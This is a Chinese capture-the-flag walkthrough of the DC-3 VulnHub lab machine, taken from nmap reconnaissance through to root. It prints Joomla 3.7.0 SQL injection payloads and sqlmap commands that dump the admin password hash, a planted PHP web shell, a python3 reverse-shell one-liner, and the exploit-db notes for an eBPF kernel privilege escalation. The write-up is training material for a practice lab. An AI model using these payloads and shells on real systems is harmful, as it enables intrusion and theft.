Dc-3靶机渗透
- 靶机地址:https://www.vulnhub.com/entry/dc-32,312/
- 难度: 低
- 目标: 获得 root 权限 + flag
- DC-3是VulnHub推出的渗透测试靶机,主要用于测试Web应用安全和渗透测试技能。
- 其特点是仅开放80端口,运行Apache Web服务器和Joomla CMS,适合初学者练习信息收集、漏洞扫描和权限提升等基础渗透技巧。
- 基础环境搭建
- 从VulnHub官网或第三方平台获取DC-3靶机镜像文件(如DC-3.zip),并解压至VMware或Kali虚拟机中。
- :将靶机与攻击机设置为同一NAT模式或桥接模式,确保攻击机与靶机处于同一局域网。
- IP使用nmap扫描靶机IP范围(如192.168.96.128/24),确定靶机真实IP(如192.168.96.131)和攻击机IP(如192.168.96.128)。
- 渗透步骤
- 信息收集
- 使用nmap全面扫描靶机端口和服务,确认80端口开放并识别出Apache/Joomla环境。
- 通过浏览器访问靶机IP(如http://192.168.96.131),观察首页提示信息。
- 漏洞扫描与利
- 安装:ml-search-more[JoomScan]{text="JoomScan"}工具(通过Kali包管理器安装),针对Joomla CMS进行专项扫描,获取后台地址(如/administrator/)。
- 使用:ml-search-more[nikto]{text="nikto"}扫描Web漏洞或配置错误。
- 权限提
- 尝试弱口令登录后台或利用Joomla已知漏洞(如组件漏洞、配置错误)获取管理员权限。
- 若无法直接突破,可尝试文件上传、SQL注入等常规攻击手段。
- 注意事项
- 该靶机设计简单,主要考验基础渗透技能,建议结合工具使用(如nmap、JoomScan、nikto)而非纯手工操作。
- 若需增加挑战难度,可尝试关闭辅助提示或调整攻击路径
- https://developer.aliyun.com/article/1362873 //相关文档
主机发现
1.查看网段
- ipconfig
- 192.68.65.132
- 主机在192.168.65.0网段
- nmap -sn 192.168.65.0/24
- └─# nmap -sn 192.168.65.0/24
- Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:17 EDT
- Nmap scan report for 192.168.65.1
- Host is up (0.00020s latency).
- MAC Address: 00:50:56:C0:00:08 (VMware)
- Nmap scan report for 192.168.65.2
- Host is up (0.00012s latency).
- MAC Address: 00:50:56:FA:BF:D8 (VMware)
- Nmap scan report for 192.168.65.147
- Host is up (0.00017s latency).
- MAC Address: 00:0C:29:4E:5A:03 (VMware)
- Nmap scan report for 192.168.65.254
- Host is up (0.0049s latency).
- MAC Address: 00:50:56:F5:D2:FC (VMware)
- Nmap scan report for 192.168.65.132
- Host is up.
- Nmap done: 256 IP addresses (5 hosts up) scanned in 2.40 seconds
- nmap -sT --min-rate 10000 -p- 192.168.65.147
- Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:19 EDT
- Nmap scan report for 192.168.65.147
- Host is up (0.0017s latency).
- Not shown: 65534 closed tcp ports (conn-refused)
- PORT STATE SERVICE
- 80/tcp open http
- MAC Address: 00:0C:29:4E:5A:03 (VMware)
- Nmap done: 1 IP address (1 host up) scanned in 6.29 seconds
- nmap -sT -sV -sC -O -p80 192.168.65.147
- └─# nmap -sT -sV -sC -O -p80 192.168.65.147
- Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-17 03:31 EDT
- Nmap scan report for 192.168.65.147
- Host is up (0.00042s latency).
- PORT STATE SERVICE VERSION
- 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- |_http-server-header: Apache/2.4.18 (Ubuntu)
- |_http-generator: Joomla! - Open Source Content Management
- |_http-title: Home
- MAC Address: 00:0C:29:4E:5A:03 (VMware)
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose
- Running: Linux 3.X|4.X
- OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
- OS details: Linux 3.2 - 4.9
- Network Distance: 1 hop
- OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 9.29 seconds
- 主机状态
- IP:192.168.65.147
- 状态:up,延迟 0.42 ms
- MAC:00:0C:29:4E:5A:03(VMware 虚拟机)
- 端口/服务
- 80/tcp open
- 服务:http
- 软件:Apache httpd 2.4.18 (Ubuntu)
- CMS:Joomla!(开源内容管理系统)
- 页面标题:Home
- Server 头:Apache/2.4.18 (Ubuntu)
- 系统指纹
- OS 类型:Linux 3.x – 4.x(大概率 Ubuntu 16.04 内核 4.4)
- 网络
- 距离:1 hop(同一网段)
- 下一步建议
- Web 渗透:Joomla 3.x 默认路径 /administrator;用 joomscan 或 joomla-cves 扫漏洞。
- 目录爆破:gobuster/dirb 扫 http://192.168.65.147/ 找备份、配置、上传点。
- 获取 shell:若 Joomla 版本 ≤ 3.4.6 可试 CVE-2015-8562 反序列化;≤ 3.7.0 可试 SQL 注入 CVE-2017-8917。
- nmap -sU --top-ports 20 192.168.65.147
默认脚本扫描- nmap --script=vuln -p80 192.168.65.147
用浏览器打开是这样的
没有任何头绪,我们前面提到爆破我门尝试爆破
目录爆破
- dirsearch -u http://192.168.65.147
我们发现有
查看历史漏洞
先用joomscan
1.JoomScan 是一款 开源、专门面向 Joomla CMS 的漏洞扫描器
在kali中直接安装- sudo apt update && sudo apt install joomscan
- # 基础扫描
- joomscan -u http://192.168.65.147
- # 同时暴力枚举组件
- joomscan -u http://192.168.65.147 --enumerate-components
- # 通过代理扫描
- joomscan -u http://192.168.65.147 --proxy http://127.0.0.1:8080
发现版本
查找漏洞- searchsploit Joomla 3.7.0
存在sql注入我们下载文档来看看- cp /usr/share/exploitdb/exploits/php/webapps/42033.txt .
- └─# cat 42033.txt
- # Exploit Title: Joomla 3.7.0 - Sql Injection
- # Date: 05-19-2017
- # Exploit Author: Mateus Lino
- # Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
- # Vendor Homepage: https://www.joomla.org/
- # Version: = 3.7.0
- # Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
- # CVE : - CVE-2017-8917
- URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27
- Using Sqlmap:
- sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
- Parameter: list[fullordering] (GET)
- Type: boolean-based blind
- Title: Boolean-based blind - Parameter replace (DUAL)
- Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)
- Type: error-based
- Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
- Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
- Type: AND/OR time-based blind
- Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
- Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)
- sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
- └─# sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables
然后直接注入数据库查看账号密码- sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns
获取密码和账号- sqlmap -u "http://192.168.65.147/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password --dump
- +----------+--------------------------------------------------------------+
- | username | password |
- +----------+--------------------------------------------------------------+
- | admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
- +----------+--------------------------------------------------------------+
得到密码
反弹shell
去创建一个文件
写入一句话木马- [/code]访问路径
- [code]/templates/protostar/shell.php?cmd=id
查看有没有python3
成功返回
构造反弹shell- python3 -c 'import socket,subprocess,os,pty;s=socket.socket();s.connect(("192.168.65.132",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/bash")'
提权
查看系统版本- www-data@DC-3:/var/www/html/templates/protostar$ uname -a
- uname -a
- Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 i686 i686 GNU/Linux
- www-data@DC-3:/var/www/html/templates/protostar$ lsb_release -a
- lsb_release -a
- No LSB modules are available.
- Distributor ID: Ubuntu
- Description: Ubuntu 16.04 LTS
- Release: 16.04
- Codename: xenial
- searchsploit Ubuntu 16.04
用先把文件cp下来
[code]cp /usr/share/exploitdb/exploits/linux/local/39772.txt .cat ─# cat 39772.txt Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and thekernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,unprivileged code can use the bpf() syscall to load eBPF socket filter programs.These conditions are fulfilled in Ubuntu 16.04.When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the firstfunction that touches the supplied eBPF instructions isreplace_map_fd_with_map_ptr(), which looks for instructions that reference eBPFmap file descriptors and looks up pointers for the corresponding map files.This is done as follows: /* look for pseudo eBPF instructions that access map FDs and * replace them with actual map pointers */ static int replace_map_fd_with_map_ptr(struct verifier_env *env) { struct bpf_insn *insn = env->prog->insnsi; int insn_cnt = env->prog->len; int i, j; for (i = 0; i < insn_cnt; i++, insn++) { [checks for bad instructions] if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) { struct bpf_map *map; struct fd f; [checks for bad instructions] f = fdget(insn->imm); map = __bpf_map_get(f); if (IS_ERR(map)) { verbose("fd %d is not pointing to valid bpf_map\n", insn->imm); fdput(f); return PTR_ERR(map); } [...] } } [...] }__bpf_map_get contains the following code:/* if error is returned, fd is released. * On success caller should complete fd access with matching fdput() */struct bpf_map *__bpf_map_get(struct fd f){ if (!f.file) return ERR_PTR(-EBADF); if (f.file->f_op != &bpf_map_fops) { fdput(f); return ERR_PTR(-EINVAL); } return f.file->private_data;}The problem is that when the caller supplies a file descriptor number referringto a struct file that is not an eBPF map, both __bpf_map_get() andreplace_map_fd_with_map_ptr() will call fdput() on the struct fd. If__fget_light() detected that the file descriptor table is shared with anothertask and therefore the FDPUT_FPUT flag is set in the struct fd, this will causethe reference count of the struct file to be over-decremented, allowing anattacker to create a use-after-free situation where a struct file is freedalthough there are still references to it.A simple proof of concept that causes oopses/crashes on a kernel compiled withmemory debugging options is attached as crasher.tar.One way to exploit this issue is to create a writable file descriptor, start awrite operation on it, wait for the kernel to verify the file's writability,then free the writable file and open a readonly file that is allocated in thesame place before the kernel writes into the freed file, allowing an attackerto write data to a readonly file. By e.g. writing to /etc/crontab, rootprivileges can then be obtained.There are two problems with this approach:The attacker should ideally be able to determine whether a newly allocatedstruct file is located at the same address as the previously freed one. Linuxprovides a syscall that performs exactly this comparison for the caller:kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).In order to make exploitation more reliable, the attacker should be able topause code execution in the kernel between the writability check of the targetfile and the actual write operation. This can be done by abusing the writev()syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delaysread accesses, then mmap()s a file containing a struct iovec from that FUSEfilesystem and passes the result of mmap() to writev(). (Another way to do thiswould be to use the userfaultfd() syscall.)writev() calls do_writev(), which looks up the struct file * corresponding tothe file descriptor number and then calls vfs_writev(). vfs_writev() verifiesthat the target file is writable, then calls do_readv_writev(), which firstcopies the struct iovec from userspace using import_iovec(), then performs therest of the write operation. Because import_iovec() performs a userspace memoryaccess, it may have to wait for pages to be faulted in - and in this case, ithas to wait for the attacker-owned FUSE filesystem to resolve the pagefault,allowing the attacker to suspend code execution in the kernel at that pointarbitrarily.An exploit that puts all this together is in exploit.tar. Usage:user@host:~/ebpf_mapfd_doubleput$ ./compile.shuser@host:~/ebpf_mapfd_doubleput$ ./doubleputstarting writevwoohoo, got pointer reusewritev returned successfully. if this worked, you'll have a root shell in |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
